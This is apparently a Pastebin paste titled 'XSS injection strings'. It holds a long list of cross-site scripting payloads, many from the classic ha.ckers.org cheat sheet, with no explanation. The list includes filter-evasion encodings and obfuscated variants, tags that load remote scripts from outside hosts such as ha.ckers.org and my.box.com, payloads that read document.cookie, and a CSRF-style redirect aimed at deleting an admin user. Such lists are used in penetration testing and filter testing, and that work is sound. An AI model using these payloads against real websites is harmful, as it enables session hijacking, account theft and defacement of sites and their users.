API tools faq
paste
Advertisement
Guest User

XSS injection strings

a guest
Aug 5th, 2015
337
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.88 KB | None | 0 0
raw download clone embed print report
  1. <script>alert(123)</script>
  2. <script>alert(“hellox worldss”);</script>
  3. javascript:alert(“hellox worldss”)
  4. <img src=”javascript:alert(‘XSS’);”>
  5. <img src=javascript:alert(&quot;XSS&quot;)>
  6. <“‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  7. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  8. <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
  9. <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
  10. <SCRIPT a=”>” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  11. <SCRIPT a=”>” ” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  12. <SCRIPT “a=’>'” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  13. <SCRIPT a=”>’>” SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  14. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  15. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  16. <“‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  17. ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))
  18. <script>alert(“hellox worldss”)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  19. <script>alert(“XSS”);</script>&search=1
  20. 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  21. <h1><font color=blue>hellox worldss</h1>
  22. <BODY ONLOAD=alert(‘hellox worldss’)>
  23. <input onfocus=write(XSS) autofocus>
  24. <input onblur=write(XSS) autofocus><input autofocus>
  25. <body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
  26. <form><button formaction=”javascript:alert(XSS)”>lol
  27. <!–<img src=”–><img src=x onerror=alert(XSS)//”>
  28. <![><img src=”]><img src=x onerror=alert(XSS)//”>
  29. <style><img src=”</style><img src=x onerror=alert(XSS)//”>
  30. <? foo=”><script>alert(1)</script>”>
  31. <! foo=”><script>alert(1)</script>”>
  32. </ foo=”><script>alert(1)</script>”>
  33. <? foo=”><x foo=’?><script>alert(1)</script>’>”>
  34. <! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”>
  35. <% foo><x foo=”%><script>alert(123)</script>”>
  36. <div style=”font-family:’foo&#10;;color:red;';”>LOL
  37. LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  38. <script>({0:#0=alert/#0#/#0#(0)})</script>
  39. <svg xmlns=”http://www.w3.org/2000/svg”>LOL<script>alert(123)</script></svg>
  40. &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  41. \\”;alert(‘XSS’);//
  42. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\”XSS\”);&lt;/SCRIPT&gt;
  43. &lt;INPUT TYPE=\”IMAGE\” SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
  44. &lt;BODY BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
  45. &lt;BODY ONLOAD=alert(‘XSS’)&gt;
  46. &lt;IMG DYNSRC=\”javascript&#058;alert(‘XSS’)\”&gt;
  47. &lt;IMG LOWSRC=\”javascript&#058;alert(‘XSS’)\”&gt;
  48. &lt;BGSOUND SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
  49. &lt;BR SIZE=\”&{alert(‘XSS’)}\”&gt;
  50. &lt;LAYER SRC=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/LAYER&gt;
  51. &lt;LINK REL=\”stylesheet\” HREF=\”javascript&#058;alert(‘XSS’);\”&gt;
  52. &lt;LINK REL=\”stylesheet\” HREF=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;css\”&gt;
  53. &lt;STYLE&gt;@import’http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  54. &lt;META HTTP-EQUIV=\”Link\” Content=\”&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\”&gt;
  55. &lt;STYLE&gt;BODY{-moz-binding&#58;url(\”http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\”)}&lt;/STYLE&gt;
  56. &lt;XSS STYLE=\”behavior&#58; url(xss&#46;htc);\”&gt;
  57. &lt;STYLE&gt;li {list-style-image&#58; url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  58. &lt;IMG SRC=’vbscript&#058;msgbox(\”XSS\”)’&gt;
  59. &lt;IMG SRC=\”mocha&#58;&#91;code&#93;\”&gt;
  60. &lt;IMG SRC=\”livescript&#058;&#91;code&#93;\”&gt;
  61. žscriptualert(EXSSE)ž/scriptu
  62. &lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript&#058;alert(‘XSS’);\”&gt;
  63. &lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”&gt;
  64. &lt;META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http&#58;//;URL=javascript&#058;alert(‘XSS’);\”
  65. &lt;IFRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/IFRAME&gt;
  66. &lt;FRAMESET&gt;&lt;FRAME SRC=\”javascript&#058;alert(‘XSS’);\”&gt;&lt;/FRAMESET&gt;
  67. &lt;TABLE BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
  68. &lt;TABLE&gt;&lt;TD BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
  69. &lt;DIV STYLE=\”background-image&#58; url(javascript&#058;alert(‘XSS’))\”&gt;
  70. &lt;DIV STYLE=\”background-image&#58;\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029’\0029\”&gt;
  71. &lt;DIV STYLE=\”background-image&#58; url(javascript&#058;alert(‘XSS’))\”&gt;
  72. &lt;DIV STYLE=\”width&#58; expression(alert(‘XSS’));\”&gt;
  73. &lt;STYLE&gt;@im\port’\ja\vasc\ript&#58;alert(\”XSS\”)';&lt;/STYLE&gt;
  74. &lt;IMG STYLE=\”xss&#58;expr/*XSS*/ession(alert(‘XSS’))\”&gt;
  75. &lt;XSS STYLE=\”xss&#58;expression(alert(‘XSS’))\”&gt;
  76. exp/*&lt;A STYLE=’no\xss&#58;noxss(\”*//*\”);
  77. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\”XSS\”))’&gt;
  78. &lt;STYLE TYPE=\”text/javascript\”&gt;alert(‘XSS’);&lt;/STYLE&gt;
  79. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  80. &lt;STYLE type=\”text/css\”&gt;BODY{background&#58;url(\”javascript&#058;alert(‘XSS’)\”)}&lt;/STYLE&gt;
  81. &lt;!–&#91;if gte IE 4&#93;&gt;
  82. &lt;SCRIPT&gt;alert(‘XSS’);&lt;/SCRIPT&gt;
  83. &lt;!&#91;endif&#93;–&gt;
  84. &lt;BASE HREF=\”javascript&#058;alert(‘XSS’);//\”&gt;
  85. &lt;OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\”&gt;&lt;/OBJECT&gt;
  86. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert(‘XSS’)&gt;&lt;/OBJECT&gt;
  87. &lt;EMBED SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;
  88. &lt;EMBED SRC=\”data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”&gt;&lt;/EMBED&gt;
  89. a=\”get\”;
  90. b=\”URL(\\”\”;
  91. c=\”javascript&#058;\”;
  92. d=\”alert(‘XSS’);\\”)\”;
  93. eval(a+b+c+d);
  94. &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\”xss\” implementation=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\”&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  95. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\”javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(‘XSS’);\”&gt;&#93;&#93;&gt;
  96. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  97. &lt;XML ID=\”xss\”&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\”javas&lt;!– –&gt;cript&#58;alert(‘XSS’)\”&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  98. &lt;SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”&gt;&lt;/SPAN&gt;
  99. &lt;XML SRC=\”xsstest&#46;xml\” ID=I&gt;&lt;/XML&gt;
  100. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  101. &lt;HTML&gt;&lt;BODY&gt;
  102. &lt;?xml&#58;namespace prefix=\”t\” ns=\”urn&#58;schemas-microsoft-com&#58;time\”&gt;
  103. &lt;?import namespace=\”t\” implementation=\”#default#time2\”&gt;
  104. &lt;t&#58;set attributeName=\”innerHTML\” to=\”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\”&gt;
  105. &lt;/BODY&gt;&lt;/HTML&gt;
  106. &lt;SCRIPT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\”&gt;&lt;/SCRIPT&gt;
  107. &lt;!–#exec cmd=\”/bin/echo ‘&lt;SCR’\”–&gt;&lt;!–#exec cmd=\”/bin/echo ‘IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;’\”–&gt;
  108. &lt;? echo(‘&lt;SCR)';
  109. echo(‘IPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;’); ?&gt;
  110. &lt;IMG SRC=\”http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\”&gt;
  111. Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  112. &lt;META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;\”&gt;
  113. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
  114. &lt;SCRIPT a=\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  115. &lt;SCRIPT =\”&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  116. &lt;SCRIPT a=\”&gt;\” ” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  117. &lt;SCRIPT \”a=’&gt;’\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  118. &lt;SCRIPT a=`&gt;` SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  119. &lt;SCRIPT a=\”&gt;’&gt;\” SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  120. &lt;SCRIPT&gt;document&#46;write(\”&lt;SCRI\”);&lt;/SCRIPT&gt;PT SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  121. &lt;A HREF=\”http&#58;//66&#46;102&#46;7&#46;147/\”&gt;XSS&lt;/A&gt;
  122. &lt;A HREF=\”http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”&gt;XSS&lt;/A&gt;
  123. &lt;A HREF=\”http&#58;//1113982867/\”&gt;XSS&lt;/A&gt;
  124. &lt;A HREF=\”http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\”&gt;XSS&lt;/A&gt;
  125. &lt;A HREF=\”http&#58;//0102&#46;0146&#46;0007&#46;00000223/\”&gt;XSS&lt;/A&gt;
  126. &lt;A HREF=\”htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\”&gt;XSS&lt;/A&gt;
  127. &lt;A HREF=\”//www&#46;google&#46;com/\”&gt;XSS&lt;/A&gt;
  128. &lt;A HREF=\”//google\”&gt;XSS&lt;/A&gt;
  129. &lt;A HREF=\”http&#58;//ha&#46;ckers&#46;org@google\”&gt;XSS&lt;/A&gt;
  130. &lt;A HREF=\”http&#58;//google&#58;ha&#46;ckers&#46;org\”&gt;XSS&lt;/A&gt;
  131. &lt;A HREF=\”http&#58;//google&#46;com/\”&gt;XSS&lt;/A&gt;
  132. &lt;A HREF=\”http&#58;//www&#46;google&#46;com&#46;/\”&gt;XSS&lt;/A&gt;
  133. &lt;A HREF=\”javascript&#058;document&#46;location=’http&#58;//www&#46;google&#46;com/’\”&gt;XSS&lt;/A&gt;
  134. &lt;A HREF=\”http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\”&gt;XSS&lt;/A&gt;
  135.  
  136. &lt;
  137. %3C
  138. &lt
  139. &lt;
  140. &LT
  141. &LT;
  142. &#60
  143. &#060
  144. &#0060
  145. &#00060
  146. &#000060
  147. &#0000060
  148. &lt;
  149. &#x3c
  150. &#x03c
  151. &#x003c
  152. &#x0003c
  153. &#x00003c
  154. &#x000003c
  155. &#x3c;
  156. &#x03c;
  157. &#x003c;
  158. &#x0003c;
  159. &#x00003c;
  160. &#x000003c;
  161. &#X3c
  162. &#X03c
  163. &#X003c
  164. &#X0003c
  165. &#X00003c
  166. &#X000003c
  167. &#X3c;
  168. &#X03c;
  169. &#X003c;
  170. &#X0003c;
  171. &#X00003c;
  172. &#X000003c;
  173. &#x3C
  174. &#x03C
  175. &#x003C
  176. &#x0003C
  177. &#x00003C
  178. &#x000003C
  179. &#x3C;
  180. &#x03C;
  181. &#x003C;
  182. &#x0003C;
  183. &#x00003C;
  184. &#x000003C;
  185. &#X3C
  186. &#X03C
  187. &#X003C
  188. &#X0003C
  189. &#X00003C
  190. &#X000003C
  191. &#X3C;
  192. &#X03C;
  193. &#X003C;
  194. &#X0003C;
  195. &#X00003C;
  196. &#X000003C;
  197. \x3c
  198. \x3C
  199. \u003c
  200. \u003C
  201. &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  202. &lt;IMG SRC=\”javascript&#058;alert(‘XSS’)\”
  203. &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  204. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  205. &lt;&lt;SCRIPT&gt;alert(\”XSS\”);//&lt;&lt;/SCRIPT&gt;
  206. &lt;SCRIPT/SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  207. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\”XSS\”)&gt;
  208. &lt;SCRIPT/XSS SRC=\”http&#58;//ha&#46;ckers&#46;org/xss&#46;js\”&gt;&lt;/SCRIPT&gt;
  209. &lt;IMG SRC=\” javascript&#058;alert(‘XSS’);\”&gt;
  210. perl -e ‘print \”&lt;SCR\0IPT&gt;alert(\\”XSS\\”)&lt;/SCR\0IPT&gt;\”;’ &gt; out
  211. perl -e ‘print \”&lt;IMG SRC=java\0script&#058;alert(\\”XSS\\”)&gt;\”;’ &gt; out
  212. &lt;IMG SRC=\”jav&#x0D;ascript&#058;alert(‘XSS’);\”&gt;
  213. &lt;IMG SRC=\”jav&#x0A;ascript&#058;alert(‘XSS’);\”&gt;
  214. &lt;IMG SRC=\”jav&#x09;ascript&#058;alert(‘XSS’);\”&gt;
  215. &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  216. &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  217. &lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt;
  218. &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  219. &lt;IMG \”\”\”&gt;&lt;SCRIPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;\”&gt;
  220. &lt;IMG SRC=`javascript&#058;alert(\”RSnake says, ‘XSS’\”)`&gt;
  221. &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  222. &lt;IMG SRC=JaVaScRiPt&#058;alert(‘XSS’)&gt;
  223. &lt;IMG SRC=javascript&#058;alert(‘XSS’)&gt;
  224. &lt;IMG SRC=\”javascript&#058;alert(‘XSS’);\”&gt;
  225. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  226. ”;!–\”&lt;XSS&gt;=&{()}
  227. ‘;alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\”;alert(String&#46;fromCharCode(88,83,83))//\\”;alert(String&#46;fromCharCode(88,83,83))//–&gt;&lt;/SCRIPT&gt;\”&gt;’&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  228. ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  229. ”;!–“<XSS>=&{()}
  230. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  231. <IMG SRC=”javascript:alert(‘XSS’);”>
  232. <IMG SRC=javascript:alert(‘XSS’)>
  233. <IMG SRC=javascrscriptipt:alert(‘XSS’)>
  234. <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  235. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
  236. <IMG SRC=” &#14; javascript:alert(‘XSS’);”>
  237. <SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  238. <SCRIPT/SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  239. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
  240. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  241. \”;alert(‘XSS’);//
  242. </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
  243. ¼script¾alert(¢XSS¢)¼/script¾
  244. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
  245. <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
  246. <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
  247. <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
  248. <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
  249. <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  250. <DIV STYLE=”background-image:\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029’\0029?>
  251. <DIV STYLE=”width: expression(alert(‘XSS’));”>
  252. <STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)';</STYLE>
  253. <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
  254. <XSS STYLE=”xss:expression(alert(‘XSS’))”>
  255.  
  256. exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>
  257. <EMBED SRC=”http://ha.ckers.org/xss.swf” AllowScriptAccess=”always”></EMBED>
  258. a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e);
  259. <SCRIPT SRC=”http://ha.ckers.org/xss.jpg”></SCRIPT>
  260. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2?><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;”></BODY></HTML>
  261. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js”></SCRIPT>
  262. <form id=”test” /><button form=”test” formaction=”javascript:alert(123)”>TESTHTML5FORMACTION
  263. <form><button formaction=”javascript:alert(123)”>crosssitespt
  264. <frameset onload=alert(123)>
  265. <!–<img src=”–><img src=x onerror=alert(123)//”>
  266. <style><img src=”</style><img src=x onerror=alert(123)//”>
  267. <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
  268. <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
  269. <embed src=”javascript:alert(1)”>
  270. <? foo=”><script>alert(1)</script>”>
  271. <! foo=”><script>alert(1)</script>”>
  272. </ foo=”><script>alert(1)</script>”>
  273. <script>({0:#0=alert/#0#/#0#(123)})</script>
  274. <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script>
  275. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script>
  276. <script src=”#”>{alert(1)}</script>;1
  277. <script>crypto.generateCRMFRequest(‘CN=0',0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script>
  278. <svg xmlns=”#”><script>alert(1)</script></svg>
  279. <svg onload=”javascript:alert(123)” xmlns=”#”></svg>
  280. <iframe xmlns=”#” src=”javascript:alert(1)”></iframe>
  281. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  282. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  283. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  284. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  285. %253cscript%253ealert(document.cookie)%253c/script%253e
  286. “><s”%2b”cript>alert(document.cookie)</script>
  287. “><ScRiPt>alert(document.cookie)</script>
  288. “><<script>alert(document.cookie);//<</script>
  289. foo%00<script>alert(document.cookie)</script>
  290. <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  291. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  292. ‘; alert(document.cookie); var foo=’
  293. foo\’; alert(document.cookie);//’;
  294. </script><script >alert(document.cookie)</script>
  295. <img src=asdf onerror=alert(document.cookie)>
  296. <BODY ONLOAD=alert(’XSS’)>
  297. <script>alert(1)</script>
  298. “><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  299. <video src=1 onerror=alert(1)>
  300. <audio src=1 onerror=alert(1)>
  301.  
  302.  
  303.  
  304. ————————————————–
  305.  
  306.  
  307. Some more payloads
  308.  
  309.  
  310.  
  311. <meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”>
  312. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  313. <SCRIPT>document.cookie=true;</SCRIPT>
  314. <IMG SRC=”jav ascript:document.cookie=true;”>
  315. <IMG SRC=”javascript:document.cookie=true;”>
  316. <IMG SRC=” &#14; javascript:document.cookie=true;”>
  317. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  318. <SCRIPT>document.cookie=true;//<</SCRIPT>
  319. <SCRIPT <B>document.cookie=true;</SCRIPT>
  320. <IMG SRC=”javascript:document.cookie=true;”>
  321. <iframe src=”javascript:document.cookie=true;>
  322. <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  323. </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  324. <INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  325. <BODY BACKGROUND=”javascript:document.cookie=true;”>
  326. <BODY ONLOAD=document.cookie=true;>
  327. <IMG DYNSRC=”javascript:document.cookie=true;”>
  328. <IMG LOWSRC=”javascript:document.cookie=true;”>
  329. <BGSOUND SRC=”javascript:document.cookie=true;”>
  330. <BR SIZE=”&{document.cookie=true}”>
  331. <LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  332. <LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  333. <STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  334. ¼script¾document.cookie=true;¼/script¾
  335. <IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  336. <FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  337. <TABLE BACKGROUND=”javascript:document.cookie=true;”>
  338. <TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  339. <DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  340. <DIV STYLE=”background-image: url(&#1;javascript:document.cookie=true;)”>
  341. <DIV STYLE=”width: expression(document.cookie=true);”>
  342. <STYLE>@im\port’\ja\vasc\ript:document.cookie=true';</STYLE>
  343. <IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  344. <CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  345. exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  346. <STYLE TYPE=”text/javascript”>document.cookie=true;</STYLE>
  347. <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  348. <STYLE type=”text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  349. <SCRIPT>document.cookie=true;</SCRIPT>
